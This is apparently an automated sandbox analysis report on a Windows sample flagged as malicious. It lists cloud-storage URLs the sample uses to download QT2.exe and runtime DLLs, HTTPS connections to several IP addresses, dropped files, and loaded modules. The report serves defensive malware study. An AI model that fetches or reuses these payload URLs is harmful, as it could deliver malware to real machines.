Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/$q
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/4p
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/Dp
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/Dq
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2271642131.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/QT2.exe
Source: LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.0000000000951000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/QT2.exeL
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/Tp
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/Tq
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/cximagecrt.dll
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/cximagecrt.dll9RB
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/cximagecrt.dllTCh
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/dp
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/j
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.0000000000951000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp120.dll
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp120.dllR
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp120.dlluR
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dll
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dllFM
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dlldTCh
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dll
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dll7SH
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dllCom
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dllTCh
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dllZR
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/tq
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/vcruntime140.d
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/vcruntime140.dTCh
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.0000000000990000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.0000000000990000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842990489.00000000009CC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514857442.00000000009CB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/vcruntime140.dll
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842990489.00000000009CC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514857442.00000000009CB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/vcruntime140.dlld
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownHTTPS traffic detected: 43.152.64.193:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 43.153.232.151:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 159.75.57.35:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: 0_2_00AC22790_2_00AC2279
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: 0_2_00ABC4A90_2_00ABC4A9
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: 0_2_00AC06BC0_2_00AC06BC
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: 0_2_00ABBCA60_2_00ABBCA6
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: 0_2_00AAFCF40_2_00AAFCF4
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: 0_2_00AB1F400_2_00AB1F40
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: String function: 00AAA700 appears 52 times
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 1156
Source: LisectAVT_2403002B_78.exeStatic PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: libcurl[1].dll.0.drStatic PE information: Resource name: DLL type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: libcurl.dll.0.drStatic PE information: Resource name: DLL type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: LisectAVT_2403002B_78.exe, 00000000.00000000.2185024840.0000000000B19000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWAB.EXEj% vs LisectAVT_2403002B_78.exe
Source: LisectAVT_2403002B_78.exeBinary or memory string: OriginalFilenameWAB.EXEj% vs LisectAVT_2403002B_78.exe
Source: LisectAVT_2403002B_78.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal56.winEXE@3/20@4/3
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeFile created: C:\Program Files (x86)\MysoftwarefJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\QT2[1].exeJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5504:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4800
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\0ccd21eb-5a44-4f40-890d-f7ecec0b3890Jump to behavior
Source: LisectAVT_2403002B_78.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe "C:\Users\user\Desktop\LisectAVT_2403002B_78.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 1156
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
